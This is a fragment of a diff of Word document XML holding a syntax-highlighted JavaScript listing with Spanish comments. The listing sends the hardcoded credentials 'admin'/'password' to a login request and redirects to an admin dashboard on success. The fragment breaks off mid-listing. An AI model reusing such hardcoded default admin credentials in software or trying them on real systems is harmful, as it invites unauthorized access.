+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>var body = "username=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>admin&amp;password</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=password";</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>xhr.onreadystatechange</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = function() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="278BD3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DC312E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.readyState</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="859900"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>==</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="859900"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DC312E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>&amp;&amp;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DC312E"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>this</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.status</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="859900"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>==</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="859900"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>200</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="696969"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">// Si la petición es exitosa, redirigir al </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="696969"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>dashboard</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="696969"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de admin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="859900"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>window</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.location</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.href</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="859900"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="2AA298"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="2AA298"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>dashboard.php</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="2AA298"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="en-US" w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">      </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>} else {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:color w:val="696969"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>// Si falla, posiblemente mostrar un mensaje o redirigir a otro lado</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="00141A"/>
+        <w:spacing w:after="0" w:line="300" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="859900"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>console</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="278BD3"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>log</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D7D7D7"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:eastAsia="es-ES"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="2AA298"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
